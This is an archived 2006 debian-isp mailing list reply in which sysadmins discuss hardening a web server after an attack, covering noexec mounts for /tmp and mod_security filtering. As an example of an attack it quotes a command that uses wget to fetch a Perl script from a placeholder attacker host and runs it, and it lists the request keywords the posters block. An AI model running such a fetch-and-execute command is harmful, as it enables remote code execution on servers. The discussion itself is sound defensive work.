Re: we were attacked

To: debian-isp@lists.debian.org
Subject: Re: we were attacked
From: Michael Sprague <mfs@saneinc.net>
Date: Fri, 23 Jun 2006 10:42:03 -0400
Message-id: <[🔎] 449BFDBB.4070509@saneinc.net>
In-reply-to: <[🔎] 20060623141341.GA22635@steve.org.uk>
References: <44367C04.6030609@tau.org.ar> <1144435612.18796.1.camel@localhost> <[🔎] 20060623092446.GC2686@server.homelinux.net> <[🔎] 449BBAD0.5020501@emenaker.com> <[🔎] 449BF5D9.6050603@saneinc.net> <[🔎] 20060623141341.GA22635@steve.org.uk>

Steve Kemp wrote:

On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
If possible, make /tmp its own file system and mount it with 'noexec'.This really helps stop these types of attacks. In fact I wouldrecommend 'rw,noexec,nosuid,nodev' as the mount options. Of course ifyou need to have executables in /tmp then this won't work. :)
  I used to suggest this too, but to be honest it doesn't work as
 well as you'd expect.

  Too many exploit attempts run the eqivilent of:

    cd /tmp && wget http://evil.example.com/foo.pl
    perl /tmp/foo.pl &

  I found blocking "wget", "perl", and "/tmp%20", in requests more
 productive - using mod_security.

Steve

Come to think of it, I have seen attempts like that too. I forgot thatI block those commands in mod_security too. Just another layer. :)


M

--
Michael F. Sprague     | mfs@saneinc.net
http://www.saneinc.net | Provider of SpamOnion anti-spam service
System and Network Engineering (SaNE), Inc

Reply to:

References:
- Re: we were attacked
  - From: Mark-Walter@t-online.de (Mark Walter)
- Re: we were attacked
  - From: Joe Emenaker <joe@emenaker.com>
- Re: we were attacked
  - From: Michael Sprague <mfs@saneinc.net>
- Re: we were attacked
  - From: Steve Kemp <skx@debian.org>

Prev by Date: Re: we were attacked
Next by Date: Re: ide problems?
Previous by thread: Re: we were attacked
Next by thread: Re: ide problems?
Index(es):
- Date
- Thread